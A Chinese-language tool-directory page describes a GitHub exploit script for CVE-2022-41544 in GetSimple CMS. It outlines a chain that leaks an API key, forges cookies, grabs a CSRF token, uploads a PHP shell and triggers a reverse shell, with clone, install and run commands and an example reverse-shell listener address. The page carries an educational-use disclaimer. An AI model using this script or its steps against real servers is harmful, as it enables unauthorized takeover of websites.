Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-41544 — Exploit script for CVE-2022-41544 in GetSimple CMS, with enhanced error handling and detailed usage instructions. | Kitploit
工具/GitHubGitHub/h3x0v3rl0rd/cve-2022-41544
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration Testing
GitHubh3x0v3rl0rd/cve-2022-41544

CVE-2022-41544

Exploit script for CVE-2022-41544 in GetSimple CMS, with enhanced error handling and detailed usage instructions.

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-41544 利用脚本

此仓库包含一个用于利用 GetSimple CMS 中 CVE-2022-41544 漏洞的脚本。该脚本执行多个步骤:检查漏洞、泄漏 API 密钥、设置 Cookie、获取 CSRF 令牌、上传 shell 以及触发 shell。

变更与改进

  1. 弃用警告处理:移除了不再需要的 telnetlib 导入,该模块对脚本功能无影响。
  2. 增强的错误处理:为 HTTP 请求和 XML 解析增加了更稳健的错误处理。
  3. 改进的用户反馈:为每一步提供详细反馈,帮助用户了解脚本进度和遇到的问题。
  4. 输入验证:确保用户对目标、路径和凭据的输入得到验证。
  5. 文档与注释:添加了注释和文档,提高代码的可读性和可用性。

使用方法

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
    cd CVE-2022-41544
    
  2. 安装依赖: 确保已安装 Python 3 和 requests 库。

    root@kitploit:~
    pip3 install requests
    
  3. 运行脚本:

    root@kitploit:~
    python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
    
    • <target>:目标域名或 IP 地址。
    • <path>:GetSimple CMS 安装路径。
    • <ip:port>:用于反弹 shell 的 IP 和端口。
    • <username>:GetSimple CMS 的管理员用户名。

    示例:

    root@kitploit:~
    python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
    

image

image

脚本概览

函数

  • print_the_banner():使用 ASCII 艺术显示风格化的横幅。
  • get_version(target, path):检查目标 GetSimple CMS 版本是否存在漏洞。
  • api_leak(target, path):尝试从授权 XML 文件中检索 API 密钥。
  • set_cookies(username, version, apikey):根据检索到的 API 密钥设置后续请求所需的 Cookie。
  • get_csrf_token(target, path, headers):提取上传 shell 所需的 CSRF 令牌。
  • upload_shell(target, path, headers, nonce, shell_content):向目标服务器上传 PHP shell。
  • shell_trigger(target, path):触发已上传的 shell 以建立反弹 shell 连接。

主函数

main() 函数按顺序调用上述函数,以利用 CVE-2022-41544 漏洞完成整个利用过程。

作者

此脚本由 h3x0v3rl0rd 开发。

免责声明

本脚本仅用于教育目的。未经授权访问系统是非法且不道德的行为。请负责任地使用本脚本,并且只在你拥有明确测试权限的系统上使用。

许可证

本项目采用 MIT 许可证 - 详见 LICENSE 文件。

下载工具